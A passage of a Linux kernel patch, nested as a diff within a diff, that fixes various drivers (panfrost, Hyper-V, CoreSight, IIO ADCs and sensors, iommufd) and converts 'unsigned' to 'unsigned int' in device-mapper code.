+ 		return MODE_NO_INTERLACE;
+diff --git a/drivers/gpu/drm/panfrost/panfrost_mmu.c b/drivers/gpu/drm/panfrost/panfrost_mmu.c
+index 666a5e53fe193..e961fa27702ce 100644
+--- a/drivers/gpu/drm/panfrost/panfrost_mmu.c
++++ b/drivers/gpu/drm/panfrost/panfrost_mmu.c
+@@ -504,6 +504,7 @@ static int panfrost_mmu_map_fault_addr(struct panfrost_device *pfdev, int as,
+ 		if (IS_ERR(pages[i])) {
+ 			mutex_unlock(&bo->base.pages_lock);
+ 			ret = PTR_ERR(pages[i]);
++			pages[i] = NULL;
+ 			goto err_pages;
+ 		}
+ 	}
+diff --git a/drivers/hv/connection.c b/drivers/hv/connection.c
+index 9dc27e5d367a2..da51b50787dff 100644
+--- a/drivers/hv/connection.c
++++ b/drivers/hv/connection.c
+@@ -409,6 +409,10 @@ void vmbus_disconnect(void)
+  */
+ struct vmbus_channel *relid2channel(u32 relid)
+ {
++	if (vmbus_connection.channels == NULL) {
++		pr_warn_once("relid2channel: relid=%d: No channels mapped!\n", relid);
++		return NULL;
++	}
+ 	if (WARN_ON(relid >= MAX_CHANNEL_RELIDS))
+ 		return NULL;
+ 	return READ_ONCE(vmbus_connection.channels[relid]);
+diff --git a/drivers/hwtracing/coresight/coresight-etm4x-core.c b/drivers/hwtracing/coresight/coresight-etm4x-core.c
+index 77bca6932f017..a65b41017cec2 100644
+--- a/drivers/hwtracing/coresight/coresight-etm4x-core.c
++++ b/drivers/hwtracing/coresight/coresight-etm4x-core.c
+@@ -454,7 +454,7 @@ static int etm4_enable_hw(struct etmv4_drvdata *drvdata)
+ 		if (etm4x_sspcicrn_present(drvdata, i))
+ 			etm4x_relaxed_write32(csa, config->ss_pe_cmp[i], TRCSSPCICRn(i));
+ 	}
+-	for (i = 0; i < drvdata->nr_addr_cmp; i++) {
++	for (i = 0; i < drvdata->nr_addr_cmp * 2; i++) {
+ 		etm4x_relaxed_write64(csa, config->addr_val[i], TRCACVRn(i));
+ 		etm4x_relaxed_write64(csa, config->addr_acc[i], TRCACATRn(i));
+ 	}
+@@ -1013,25 +1013,21 @@ static bool etm4_init_iomem_access(struct etmv4_drvdata *drvdata,
+ 				   struct csdev_access *csa)
+ {
+ 	u32 devarch = readl_relaxed(drvdata->base + TRCDEVARCH);
+-	u32 idr1 = readl_relaxed(drvdata->base + TRCIDR1);
+ 
+ 	/*
+ 	 * All ETMs must implement TRCDEVARCH to indicate that
+-	 * the component is an ETMv4. To support any broken
+-	 * implementations we fall back to TRCIDR1 check, which
+-	 * is not really reliable.
++	 * the component is an ETMv4. Even though TRCIDR1 also
++	 * contains the information, it is part of the "Trace"
++	 * register and must be accessed with the OSLK cleared,
++	 * with MMIO. But we cannot touch the OSLK until we are
++	 * sure this is an ETM. So rely only on the TRCDEVARCH.
+ 	 */
+-	if ((devarch & ETM_DEVARCH_ID_MASK) == ETM_DEVARCH_ETMv4x_ARCH) {
+-		drvdata->arch = etm_devarch_to_arch(devarch);
+-	} else {
+-		pr_warn("CPU%d: ETM4x incompatible TRCDEVARCH: %x, falling back to TRCIDR1\n",
+-			smp_processor_id(), devarch);
+-
+-		if (ETM_TRCIDR1_ARCH_MAJOR(idr1) != ETM_TRCIDR1_ARCH_ETMv4)
+-			return false;
+-		drvdata->arch = etm_trcidr_to_arch(idr1);
++	if ((devarch & ETM_DEVARCH_ID_MASK) != ETM_DEVARCH_ETMv4x_ARCH) {
++		pr_warn_once("TRCDEVARCH doesn't match ETMv4 architecture\n");
++		return false;
+ 	}
+ 
++	drvdata->arch = etm_devarch_to_arch(devarch);
+ 	*csa = CSDEV_ACCESS_IOMEM(drvdata->base);
+ 	return true;
+ }
+diff --git a/drivers/hwtracing/coresight/coresight-etm4x.h b/drivers/hwtracing/coresight/coresight-etm4x.h
+index 4b21bb79f1682..0174fbf1a9637 100644
+--- a/drivers/hwtracing/coresight/coresight-etm4x.h
++++ b/drivers/hwtracing/coresight/coresight-etm4x.h
+@@ -753,14 +753,12 @@
+  * TRCDEVARCH	- CoreSight architected register
+  *                - Bits[15:12] - Major version
+  *                - Bits[19:16] - Minor version
+- * TRCIDR1	- ETM architected register
+- *                - Bits[11:8] - Major version
+- *                - Bits[7:4]  - Minor version
+- * We must rely on TRCDEVARCH for the version information,
+- * however we don't want to break the support for potential
+- * old implementations which might not implement it. Thus
+- * we fall back to TRCIDR1 if TRCDEVARCH is not implemented
+- * for memory mapped components.
++ *
++ * We must rely only on TRCDEVARCH for the version information. Even though,
++ * TRCIDR1 also provides the architecture version, it is a "Trace" register
++ * and as such must be accessed only with Trace power domain ON. This may
++ * not be available at probe time.
++ *
+  * Now to make certain decisions easier based on the version
+  * we use an internal representation of the version in the
+  * driver, as follows :
+@@ -786,12 +784,6 @@ static inline u8 etm_devarch_to_arch(u32 devarch)
+ 				ETM_DEVARCH_REVISION(devarch));
+ }
+ 
+-static inline u8 etm_trcidr_to_arch(u32 trcidr1)
+-{
+-	return ETM_ARCH_VERSION(ETM_TRCIDR1_ARCH_MAJOR(trcidr1),
+-				ETM_TRCIDR1_ARCH_MINOR(trcidr1));
+-}
+-
+ enum etm_impdef_type {
+ 	ETM4_IMPDEF_HISI_CORE_COMMIT,
+ 	ETM4_IMPDEF_FEATURE_MAX,
+diff --git a/drivers/iio/accel/kionix-kx022a.c b/drivers/iio/accel/kionix-kx022a.c
+index f866859855cdd..1c3a72380fb85 100644
+--- a/drivers/iio/accel/kionix-kx022a.c
++++ b/drivers/iio/accel/kionix-kx022a.c
+@@ -864,7 +864,7 @@ static irqreturn_t kx022a_trigger_handler(int irq, void *p)
+ 	if (ret < 0)
+ 		goto err_read;
+ 
+-	iio_push_to_buffers_with_timestamp(idev, data->buffer, pf->timestamp);
++	iio_push_to_buffers_with_timestamp(idev, data->buffer, data->timestamp);
+ err_read:
+ 	iio_trigger_notify_done(idev->trig);
+ 
+diff --git a/drivers/iio/adc/ad7791.c b/drivers/iio/adc/ad7791.c
+index fee8d129a5f08..86effe8501b44 100644
+--- a/drivers/iio/adc/ad7791.c
++++ b/drivers/iio/adc/ad7791.c
+@@ -253,7 +253,7 @@ static const struct ad_sigma_delta_info ad7791_sigma_delta_info = {
+ 	.has_registers = true,
+ 	.addr_shift = 4,
+ 	.read_mask = BIT(3),
+-	.irq_flags = IRQF_TRIGGER_LOW,
++	.irq_flags = IRQF_TRIGGER_FALLING,
+ };
+ 
+ static int ad7791_read_raw(struct iio_dev *indio_dev,
+diff --git a/drivers/iio/adc/ltc2497.c b/drivers/iio/adc/ltc2497.c
+index 17370c5eb6fe3..ec198c6f13d6b 100644
+--- a/drivers/iio/adc/ltc2497.c
++++ b/drivers/iio/adc/ltc2497.c
+@@ -28,7 +28,6 @@ struct ltc2497_driverdata {
+ 	struct ltc2497core_driverdata common_ddata;
+ 	struct i2c_client *client;
+ 	u32 recv_size;
+-	u32 sub_lsb;
+ 	/*
+ 	 * DMA (thus cache coherency maintenance) may require the
+ 	 * transfer buffers to live in their own cache lines.
+@@ -65,10 +64,10 @@ static int ltc2497_result_and_measure(struct ltc2497core_driverdata *ddata,
+ 		 * equivalent to a sign extension.
+ 		 */
+ 		if (st->recv_size == 3) {
+-			*val = (get_unaligned_be24(st->data.d8) >> st->sub_lsb)
++			*val = (get_unaligned_be24(st->data.d8) >> 6)
+ 				- BIT(ddata->chip_info->resolution + 1);
+ 		} else {
+-			*val = (be32_to_cpu(st->data.d32) >> st->sub_lsb)
++			*val = (be32_to_cpu(st->data.d32) >> 6)
+ 				- BIT(ddata->chip_info->resolution + 1);
+ 		}
+ 
+@@ -122,7 +121,6 @@ static int ltc2497_probe(struct i2c_client *client)
+ 	st->common_ddata.chip_info = chip_info;
+ 
+ 	resolution = chip_info->resolution;
+-	st->sub_lsb = 31 - (resolution + 1);
+ 	st->recv_size = BITS_TO_BYTES(resolution) + 1;
+ 
+ 	return ltc2497core_probe(dev, indio_dev);
+diff --git a/drivers/iio/adc/max11410.c b/drivers/iio/adc/max11410.c
+index fdc9f03135b54..e64cd979688d0 100644
+--- a/drivers/iio/adc/max11410.c
++++ b/drivers/iio/adc/max11410.c
+@@ -413,13 +413,17 @@ static int max11410_sample(struct max11410_state *st, int *sample_raw,
+ 		if (!ret)
+ 			return -ETIMEDOUT;
+ 	} else {
++		int ret2;
++
+ 		/* Wait for status register Conversion Ready flag */
+-		ret = read_poll_timeout(max11410_read_reg, ret,
+-					ret || (val & MAX11410_STATUS_CONV_READY_BIT),
++		ret = read_poll_timeout(max11410_read_reg, ret2,
++					ret2 || (val & MAX11410_STATUS_CONV_READY_BIT),
+ 					5000, MAX11410_CONVERSION_TIMEOUT_MS * 1000,
+ 					true, st, MAX11410_REG_STATUS, &val);
+ 		if (ret)
+ 			return ret;
++		if (ret2)
++			return ret2;
+ 	}
+ 
+ 	/* Read ADC Data */
+@@ -850,17 +854,21 @@ static int max11410_init_vref(struct device *dev,
+ 
+ static int max11410_calibrate(struct max11410_state *st, u32 cal_type)
+ {
+-	int ret, val;
++	int ret, ret2, val;
+ 
+ 	ret = max11410_write_reg(st, MAX11410_REG_CAL_START, cal_type);
+ 	if (ret)
+ 		return ret;
+ 
+ 	/* Wait for status register Calibration Ready flag */
+-	return read_poll_timeout(max11410_read_reg, ret,
+-				 ret || (val & MAX11410_STATUS_CAL_READY_BIT),
+-				 50000, MAX11410_CALIB_TIMEOUT_MS * 1000, true,
+-				 st, MAX11410_REG_STATUS, &val);
++	ret = read_poll_timeout(max11410_read_reg, ret2,
++				ret2 || (val & MAX11410_STATUS_CAL_READY_BIT),
++				50000, MAX11410_CALIB_TIMEOUT_MS * 1000, true,
++				st, MAX11410_REG_STATUS, &val);
++	if (ret)
++		return ret;
++
++	return ret2;
+ }
+ 
+ static int max11410_self_calibrate(struct max11410_state *st)
+diff --git a/drivers/iio/adc/qcom-spmi-adc5.c b/drivers/iio/adc/qcom-spmi-adc5.c
+index 821fee60a7651..d1b86570768a9 100644
+--- a/drivers/iio/adc/qcom-spmi-adc5.c
++++ b/drivers/iio/adc/qcom-spmi-adc5.c
+@@ -626,12 +626,20 @@ static int adc5_get_fw_channel_data(struct adc5_chip *adc,
+ 				    struct fwnode_handle *fwnode,
+ 				    const struct adc5_data *data)
+ {
+-	const char *name = fwnode_get_name(fwnode), *channel_name;
++	const char *channel_name;
++	char *name;
+ 	u32 chan, value, varr[2];
+ 	u32 sid = 0;
+ 	int ret;
+ 	struct device *dev = adc->dev;
+ 
++	name = devm_kasprintf(dev, GFP_KERNEL, "%pfwP", fwnode);
++	if (!name)
++		return -ENOMEM;
++
++	/* Cut the address part */
++	name[strchrnul(name, '@') - name] = '\0';
++
+ 	ret = fwnode_property_read_u32(fwnode, "reg", &chan);
+ 	if (ret) {
+ 		dev_err(dev, "invalid channel number %s\n", name);
+diff --git a/drivers/iio/adc/ti-ads7950.c b/drivers/iio/adc/ti-ads7950.c
+index 2cc9a9bd9db60..263fc3a1b87e1 100644
+--- a/drivers/iio/adc/ti-ads7950.c
++++ b/drivers/iio/adc/ti-ads7950.c
+@@ -634,6 +634,7 @@ static int ti_ads7950_probe(struct spi_device *spi)
+ 	st->chip.label = dev_name(&st->spi->dev);
+ 	st->chip.parent = &st->spi->dev;
+ 	st->chip.owner = THIS_MODULE;
++	st->chip.can_sleep = true;
+ 	st->chip.base = -1;
+ 	st->chip.ngpio = TI_ADS7950_NUM_GPIOS;
+ 	st->chip.get_direction = ti_ads7950_get_direction;
+diff --git a/drivers/iio/dac/cio-dac.c b/drivers/iio/dac/cio-dac.c
+index 791dd999cf291..18a64f72fc188 100644
+--- a/drivers/iio/dac/cio-dac.c
++++ b/drivers/iio/dac/cio-dac.c
+@@ -66,8 +66,8 @@ static int cio_dac_write_raw(struct iio_dev *indio_dev,
+ 	if (mask != IIO_CHAN_INFO_RAW)
+ 		return -EINVAL;
+ 
+-	/* DAC can only accept up to a 16-bit value */
+-	if ((unsigned int)val > 65535)
++	/* DAC can only accept up to a 12-bit value */
++	if ((unsigned int)val > 4095)
+ 		return -EINVAL;
+ 
+ 	priv->chan_out_states[chan->channel] = val;
+diff --git a/drivers/iio/imu/Kconfig b/drivers/iio/imu/Kconfig
+index f1d7d4b5e2224..c2f97629e9cdb 100644
+--- a/drivers/iio/imu/Kconfig
++++ b/drivers/iio/imu/Kconfig
+@@ -47,6 +47,7 @@ config ADIS16480
+ 	depends on SPI
+ 	select IIO_ADIS_LIB
+ 	select IIO_ADIS_LIB_BUFFER if IIO_BUFFER
++	select CRC32
+ 	help
+ 	  Say yes here to build support for Analog Devices ADIS16375, ADIS16480,
+ 	  ADIS16485, ADIS16488 inertial sensors.
+diff --git a/drivers/iio/industrialio-buffer.c b/drivers/iio/industrialio-buffer.c
+index 80c78bd6bbef4..a7a080bed1808 100644
+--- a/drivers/iio/industrialio-buffer.c
++++ b/drivers/iio/industrialio-buffer.c
+@@ -203,24 +203,27 @@ static ssize_t iio_buffer_write(struct file *filp, const char __user *buf,
+ 				break;
+ 			}
+ 
++			if (filp->f_flags & O_NONBLOCK) {
++				if (!written)
++					ret = -EAGAIN;
++				break;
++			}
++
+ 			wait_woken(&wait, TASK_INTERRUPTIBLE,
+ 					MAX_SCHEDULE_TIMEOUT);
+ 			continue;
+ 		}
+ 
+ 		ret = rb->access->write(rb, n - written, buf + written);
+-		if (ret == 0 && (filp->f_flags & O_NONBLOCK))
+-			ret = -EAGAIN;
++		if (ret < 0)
++			break;
+ 
+-		if (ret > 0) {
+-			written += ret;
+-			if (written != n && !(filp->f_flags & O_NONBLOCK))
+-				continue;
+-		}
+-	} while (ret == 0);
++		written += ret;
++
++	} while (written != n);
+ 	remove_wait_queue(&rb->pollq, &wait);
+ 
+-	return ret < 0 ? ret : n;
++	return ret < 0 ? ret : written;
+ }
+ 
+ /**
+diff --git a/drivers/iio/light/cm32181.c b/drivers/iio/light/cm32181.c
+index b1674a5bfa368..d4a34a3bf00d9 100644
+--- a/drivers/iio/light/cm32181.c
++++ b/drivers/iio/light/cm32181.c
+@@ -429,6 +429,14 @@ static const struct iio_info cm32181_info = {
+ 	.attrs			= &cm32181_attribute_group,
+ };
+ 
++static void cm32181_unregister_dummy_client(void *data)
++{
++	struct i2c_client *client = data;
++
++	/* Unregister the dummy client */
++	i2c_unregister_device(client);
++}
++
+ static int cm32181_probe(struct i2c_client *client)
+ {
+ 	struct device *dev = &client->dev;
+@@ -460,6 +468,10 @@ static int cm32181_probe(struct i2c_client *client)
+ 		client = i2c_acpi_new_device(dev, 1, &board_info);
+ 		if (IS_ERR(client))
+ 			return PTR_ERR(client);
++
++		ret = devm_add_action_or_reset(dev, cm32181_unregister_dummy_client, client);
++		if (ret)
++			return ret;
+ 	}
+ 
+ 	cm32181 = iio_priv(indio_dev);
+diff --git a/drivers/iio/light/vcnl4000.c b/drivers/iio/light/vcnl4000.c
+index cc1a2062e76d6..69c5bc987e261 100644
+--- a/drivers/iio/light/vcnl4000.c
++++ b/drivers/iio/light/vcnl4000.c
+@@ -199,7 +199,6 @@ static int vcnl4000_init(struct vcnl4000_data *data)
+ 
+ 	data->rev = ret & 0xf;
+ 	data->al_scale = 250000;
+-	mutex_init(&data->vcnl4000_lock);
+ 
+ 	return data->chip_spec->set_power_state(data, true);
+ };
+@@ -1197,6 +1196,8 @@ static int vcnl4000_probe(struct i2c_client *client)
+ 	data->id = id->driver_data;
+ 	data->chip_spec = &vcnl4000_chip_spec_cfg[data->id];
+ 
++	mutex_init(&data->vcnl4000_lock);
++
+ 	ret = data->chip_spec->init(data);
+ 	if (ret < 0)
+ 		return ret;
+diff --git a/drivers/iommu/iommufd/pages.c b/drivers/iommu/iommufd/pages.c
+index 1e1d3509efae5..105e0c4dc1990 100644
+--- a/drivers/iommu/iommufd/pages.c
++++ b/drivers/iommu/iommufd/pages.c
+@@ -294,9 +294,9 @@ static void batch_clear_carry(struct pfn_batch *batch, unsigned int keep_pfns)
+ 			batch->npfns[batch->end - 1] < keep_pfns);
+ 
+ 	batch->total_pfns = keep_pfns;
+-	batch->npfns[0] = keep_pfns;
+ 	batch->pfns[0] = batch->pfns[batch->end - 1] +
+ 			 (batch->npfns[batch->end - 1] - keep_pfns);
++	batch->npfns[0] = keep_pfns;
+ 	batch->end = 0;
+ }
+ 
+@@ -1140,6 +1140,7 @@ struct iopt_pages *iopt_alloc_pages(void __user *uptr, unsigned long length,
+ 				    bool writable)
+ {
+ 	struct iopt_pages *pages;
++	unsigned long end;
+ 
+ 	/*
+ 	 * The iommu API uses size_t as the length, and protect the DIV_ROUND_UP
+@@ -1148,6 +1149,9 @@ struct iopt_pages *iopt_alloc_pages(void __user *uptr, unsigned long length,
+ 	if (length > SIZE_MAX - PAGE_SIZE || length == 0)
+ 		return ERR_PTR(-EINVAL);
+ 
++	if (check_add_overflow((unsigned long)uptr, length, &end))
++		return ERR_PTR(-EOVERFLOW);
++
+ 	pages = kzalloc(sizeof(*pages), GFP_KERNEL_ACCOUNT);
+ 	if (!pages)
+ 		return ERR_PTR(-ENOMEM);
+@@ -1201,13 +1205,21 @@ iopt_area_unpin_domain(struct pfn_batch *batch, struct iopt_area *area,
+ 			unsigned long start =
+ 				max(start_index, *unmapped_end_index);
+ 
++			if (IS_ENABLED(CONFIG_IOMMUFD_TEST) &&
++			    batch->total_pfns)
++				WARN_ON(*unmapped_end_index -
++						batch->total_pfns !=
++					start_index);
+ 			batch_from_domain(batch, domain, area, start,
+ 					  last_index);
+-			batch_last_index = start + batch->total_pfns - 1;
++			batch_last_index = start_index + batch->total_pfns - 1;
+ 		} else {
+ 			batch_last_index = last_index;
+ 		}
+ 
++		if (IS_ENABLED(CONFIG_IOMMUFD_TEST))
++			WARN_ON(batch_last_index > real_last_index);
++
+ 		/*
+ 		 * unmaps must always 'cut' at a place where the pfns are not
+ 		 * contiguous to pair with the maps that always install
+diff --git a/drivers/md/dm-bio-prison-v1.c b/drivers/md/dm-bio-prison-v1.c
+index 1f8f98efd97a0..138067abe14b7 100644
+--- a/drivers/md/dm-bio-prison-v1.c
++++ b/drivers/md/dm-bio-prison-v1.c
+@@ -285,14 +285,14 @@ EXPORT_SYMBOL_GPL(dm_cell_promote_or_release);
+ 
+ struct dm_deferred_entry {
+ 	struct dm_deferred_set *ds;
+-	unsigned count;
++	unsigned int count;
+ 	struct list_head work_items;
+ };
+ 
+ struct dm_deferred_set {
+ 	spinlock_t lock;
+-	unsigned current_entry;
+-	unsigned sweeper;
++	unsigned int current_entry;
++	unsigned int sweeper;
+ 	struct dm_deferred_entry entries[DEFERRED_SET_SIZE];
+ };
+ 
+@@ -338,7 +338,7 @@ struct dm_deferred_entry *dm_deferred_entry_inc(struct dm_deferred_set *ds)
+ }
+ EXPORT_SYMBOL_GPL(dm_deferred_entry_inc);
+ 
+-static unsigned ds_next(unsigned index)
++static unsigned int ds_next(unsigned int index)
+ {
+ 	return (index + 1) % DEFERRED_SET_SIZE;
+ }
+@@ -373,7 +373,7 @@ EXPORT_SYMBOL_GPL(dm_deferred_entry_dec);
+ int dm_deferred_set_add_work(struct dm_deferred_set *ds, struct list_head *work)
+ {
+ 	int r = 1;
+-	unsigned next_entry;
++	unsigned int next_entry;
+ 
+ 	spin_lock_irq(&ds->lock);
+ 	if ((ds->sweeper == ds->current_entry) &&
+diff --git a/drivers/md/dm-bio-prison-v2.c b/drivers/md/dm-bio-prison-v2.c
+index 9dec3b61cf70a..0cc0d13c40e51 100644
+--- a/drivers/md/dm-bio-prison-v2.c
++++ b/drivers/md/dm-bio-prison-v2.c
+@@ -148,7 +148,7 @@ static bool __find_or_insert(struct dm_bio_prison_v2 *prison,
+ 
+ static bool __get(struct dm_bio_prison_v2 *prison,
+ 		  struct dm_cell_key_v2 *key,
+-		  unsigned lock_level,
++		  unsigned int lock_level,
+ 		  struct bio *inmate,
+ 		  struct dm_bio_prison_cell_v2 *cell_prealloc,
+ 		  struct dm_bio_prison_cell_v2 **cell)
+@@ -171,7 +171,7 @@ static bool __get(struct dm_bio_prison_v2 *prison,
+ 
+ bool dm_cell_get_v2(struct dm_bio_prison_v2 *prison,
+ 		    struct dm_cell_key_v2 *key,
+-		    unsigned lock_level,
++		    unsigned int lock_level,
+ 		    struct bio *inmate,
+ 		    struct dm_bio_prison_cell_v2 *cell_prealloc,
+ 		    struct dm_bio_prison_cell_v2 **cell_result)
+@@ -224,7 +224,7 @@ EXPORT_SYMBOL_GPL(dm_cell_put_v2);
+ 
+ static int __lock(struct dm_bio_prison_v2 *prison,
+ 		  struct dm_cell_key_v2 *key,
+-		  unsigned lock_level,
++		  unsigned int lock_level,
+ 		  struct dm_bio_prison_cell_v2 *cell_prealloc,
+ 		  struct dm_bio_prison_cell_v2 **cell_result)
+ {
+@@ -255,7 +255,7 @@ static int __lock(struct dm_bio_prison_v2 *prison,
+ 
+ int dm_cell_lock_v2(struct dm_bio_prison_v2 *prison,
+ 		    struct dm_cell_key_v2 *key,
+-		    unsigned lock_level,
++		    unsigned int lock_level,
+ 		    struct dm_bio_prison_cell_v2 *cell_prealloc,
+ 		    struct dm_bio_prison_cell_v2 **cell_result)
+ {
+@@ -291,7 +291,7 @@ EXPORT_SYMBOL_GPL(dm_cell_quiesce_v2);
+ 
+ static int __promote(struct dm_bio_prison_v2 *prison,
+ 		     struct dm_bio_prison_cell_v2 *cell,
+-		     unsigned new_lock_level)
++		     unsigned int new_lock_level)
+ {
+ 	if (!cell->exclusive_lock)
+ 		return -EINVAL;
+@@ -302,7 +302,7 @@ static int __promote(struct dm_bio_prison_v2 *prison,
+ 
+ int dm_cell_lock_promote_v2(struct dm_bio_prison_v2 *prison,
+ 			    struct dm_bio_prison_cell_v2 *cell,
+-			    unsigned new_lock_level)
++			    unsigned int new_lock_level)
+ {
+ 	int r;
+ 
+diff --git a/drivers/md/dm-bio-prison-v2.h b/drivers/md/dm-bio-prison-v2.h
+index 6e04234268db3..5a7d996bbbd80 100644
+--- a/drivers/md/dm-bio-prison-v2.h
++++ b/drivers/md/dm-bio-prison-v2.h
+@@ -44,8 +44,8 @@ struct dm_cell_key_v2 {
+ struct dm_bio_prison_cell_v2 {
+ 	// FIXME: pack these
+ 	bool exclusive_lock;
+-	unsigned exclusive_level;
+-	unsigned shared_count;
++	unsigned int exclusive_level;
++	unsigned int shared_count;
+ 	struct work_struct *quiesce_continuation;
+ 
+ 	struct rb_node node;
+@@ -86,7 +86,7 @@ void dm_bio_prison_free_cell_v2(struct dm_bio_prison_v2 *prison,
+  */
+ bool dm_cell_get_v2(struct dm_bio_prison_v2 *prison,
+ 		    struct dm_cell_key_v2 *key,
+-		    unsigned lock_level,
++		    unsigned int lock_level,
+ 		    struct bio *inmate,
+ 		    struct dm_bio_prison_cell_v2 *cell_prealloc,
+ 		    struct dm_bio_prison_cell_v2 **cell_result);
+@@ -114,7 +114,7 @@ bool dm_cell_put_v2(struct dm_bio_prison_v2 *prison,
+  */
+ int dm_cell_lock_v2(struct dm_bio_prison_v2 *prison,
+ 		    struct dm_cell_key_v2 *key,
+-		    unsigned lock_level,
++		    unsigned int lock_level,
+ 		    struct dm_bio_prison_cell_v2 *cell_prealloc,
+ 		    struct dm_bio_prison_cell_v2 **cell_result);
+ 
+@@ -132,7 +132,7 @@ void dm_cell_quiesce_v2(struct dm_bio_prison_v2 *prison,
+  */
+ int dm_cell_lock_promote_v2(struct dm_bio_prison_v2 *prison,
+ 			    struct dm_bio_prison_cell_v2 *cell,
+-			    unsigned new_lock_level);
++			    unsigned int new_lock_level);
+ 
+ /*
+  * Adds any held bios to the bio list.
+diff --git a/drivers/md/dm-bufio.c b/drivers/md/dm-bufio.c
+index 19caaf684ee34..382c5cc471952 100644
+--- a/drivers/md/dm-bufio.c
++++ b/drivers/md/dm-bufio.c
+@@ -89,7 +89,7 @@ struct dm_bufio_client {
+ 	unsigned long n_buffers[LIST_SIZE];
+ 
+ 	struct block_device *bdev;
+-	unsigned block_size;
++	unsigned int block_size;
+ 	s8 sectors_per_block_bits;
+ 	void (*alloc_callback)(struct dm_buffer *);
+ 	void (*write_callback)(struct dm_buffer *);
+@@ -98,9 +98,9 @@ struct dm_bufio_client {
+ 	struct dm_io_client *dm_io;
+ 
+ 	struct list_head reserved_buffers;
+-	unsigned need_reserved_buffers;
++	unsigned int need_reserved_buffers;
+ 
+-	unsigned minimum_buffers;
++	unsigned int minimum_buffers;
+ 
+ 	struct rb_root buffer_tree;
+ 	wait_queue_head_t free_buffer_wait;
+@@ -145,14 +145,14 @@ struct dm_buffer {
+ 	unsigned char list_mode;		/* LIST_* */
+ 	blk_status_t read_error;
+ 	blk_status_t write_error;
+-	unsigned accessed;
+-	unsigned hold_count;
++	unsigned int accessed;
++	unsigned int hold_count;
+ 	unsigned long state;
+ 	unsigned long last_accessed;
+-	unsigned dirty_start;
+-	unsigned dirty_end;
+-	unsigned write_start;
+-	unsigned write_end;
++	unsigned int dirty_start;
++	unsigned int dirty_end;
++	unsigned int write_start;
++	unsigned int write_end;
+ 	struct dm_bufio_client *c;
+ 	struct list_head write_list;
+ 	void (*end_io)(struct dm_buffer *, blk_status_t);
+@@ -220,7 +220,7 @@ static unsigned long global_num = 0;
+ /*
+  * Buffers are freed after this timeout
+  */
+-static unsigned dm_bufio_max_age = DM_BUFIO_DEFAULT_AGE_SECS;
++static unsigned int dm_bufio_max_age = DM_BUFIO_DEFAULT_AGE_SECS;
+ static unsigned long dm_bufio_retain_bytes = DM_BUFIO_DEFAULT_RETAIN_BYTES;
+ 
+ static unsigned long dm_bufio_peak_allocated;
+@@ -438,7 +438,7 @@ static void *alloc_buffer_data(struct dm_bufio_client *c, gfp_t gfp_mask,
+ 	 * as if GFP_NOIO was specified.
+ 	 */
+ 	if (gfp_mask & __GFP_NORETRY) {
+-		unsigned noio_flag = memalloc_noio_save();
++		unsigned int noio_flag = memalloc_noio_save();
+ 		void *ptr = __vmalloc(c->block_size, gfp_mask);
+ 
+ 		memalloc_noio_restore(noio_flag);
+@@ -591,7 +591,7 @@ static void dmio_complete(unsigned long error, void *context)
+ }
+ 
+ static void use_dmio(struct dm_buffer *b, enum req_op op, sector_t sector,
+-		     unsigned n_sectors, unsigned offset)
++		     unsigned int n_sectors, unsigned int offset)
+ {
+ 	int r;
+ 	struct dm_io_request io_req = {
+@@ -629,11 +629,11 @@ static void bio_complete(struct bio *bio)
+ }
+ 
+ static void use_bio(struct dm_buffer *b, enum req_op op, sector_t sector,
+-		    unsigned n_sectors, unsigned offset)
++		    unsigned int n_sectors, unsigned int offset)
+ {
+ 	struct bio *bio;
+ 	char *ptr;
+-	unsigned vec_size, len;
++	unsigned int vec_size, len;
+ 
+ 	vec_size = b->c->block_size >> PAGE_SHIFT;
+ 	if (unlikely(b->c->sectors_per_block_bits < PAGE_SHIFT - SECTOR_SHIFT))
+@@ -654,7 +654,7 @@ dmio:
+ 	len = n_sectors << SECTOR_SHIFT;
+ 
+ 	do {
+-		unsigned this_step = min((unsigned)(PAGE_SIZE - offset_in_page(ptr)), len);
++		unsigned int this_step = min((unsigned int)(PAGE_SIZE - offset_in_page(ptr)), len);
+ 		if (!bio_add_page(bio, virt_to_page(ptr), this_step,
+ 				  offset_in_page(ptr))) {
+ 			bio_put(bio);
+@@ -684,9 +684,9 @@ static inline sector_t block_to_sector(struct dm_bufio_client *c, sector_t block
+ static void submit_io(struct dm_buffer *b, enum req_op op,
+ 		      void (*end_io)(struct dm_buffer *, blk_status_t))
+ {
+-	unsigned n_sectors;
++	unsigned int n_sectors;
+ 	sector_t sector;
+-	unsigned offset, end;
++	unsigned int offset, end;
+ 
+ 	b->end_io = end_io;
+ 
+@@ -1156,7 +1156,7 @@ void *dm_bufio_new(struct dm_bufio_client *c, sector_t block,
+ EXPORT_SYMBOL_GPL(dm_bufio_new);
+ 
+ void dm_bufio_prefetch(struct dm_bufio_client *c,
+-		       sector_t block, unsigned n_blocks)
++		       sector_t block, unsigned int n_blocks)
+ {
+ 	struct blk_plug plug;
+ 
+@@ -1232,7 +1232,7 @@ void dm_bufio_release(struct dm_buffer *b)
+ EXPORT_SYMBOL_GPL(dm_bufio_release);
+ 
+ void dm_bufio_mark_partial_buffer_dirty(struct dm_buffer *b,
+-					unsigned start, unsigned end)
++					unsigned int start, unsigned int end)
+ {
+ 	struct dm_bufio_client *c = b->c;
+ 
+@@ -1529,13 +1529,13 @@ void dm_bufio_forget_buffers(struct dm_bufio_client *c, sector_t block, sector_t
+ }
+ EXPORT_SYMBOL_GPL(dm_bufio_forget_buffers);
+ 
+-void dm_bufio_set_minimum_buffers(struct dm_bufio_client *c, unsigned n)
++void dm_bufio_set_minimum_buffers(struct dm_bufio_client *c, unsigned int n)
+ {
+ 	c->minimum_buffers = n;
+ }
+ EXPORT_SYMBOL_GPL(dm_bufio_set_minimum_buffers);
+ 
+-unsigned dm_bufio_get_block_size(struct dm_bufio_client *c)
++unsigned int dm_bufio_get_block_size(struct dm_bufio_client *c)
+ {
+ 	return c->block_size;
+ }
+@@ -1734,15 +1734,15 @@ static unsigned long dm_bufio_shrink_count(struct shrinker *shrink, struct shrin
+ /*
+  * Create the buffering interface
+  */
+-struct dm_bufio_client *dm_bufio_client_create(struct block_device *bdev, unsigned block_size,
+-					       unsigned reserved_buffers, unsigned aux_size,
++struct dm_bufio_client *dm_bufio_client_create(struct block_device *bdev, unsigned int block_size,
++					       unsigned int reserved_buffers, unsigned int aux_size,
+ 					       void (*alloc_callback)(struct dm_buffer *),
+ 					       void (*write_callback)(struct dm_buffer *),
+ 					       unsigned int flags)
+ {
+ 	int r;
+ 	struct dm_bufio_client *c;
+-	unsigned i;
++	unsigned int i;
+ 	char slab_name[27];
+ 
+ 	if (!block_size || block_size & ((1 << SECTOR_SHIFT) - 1)) {
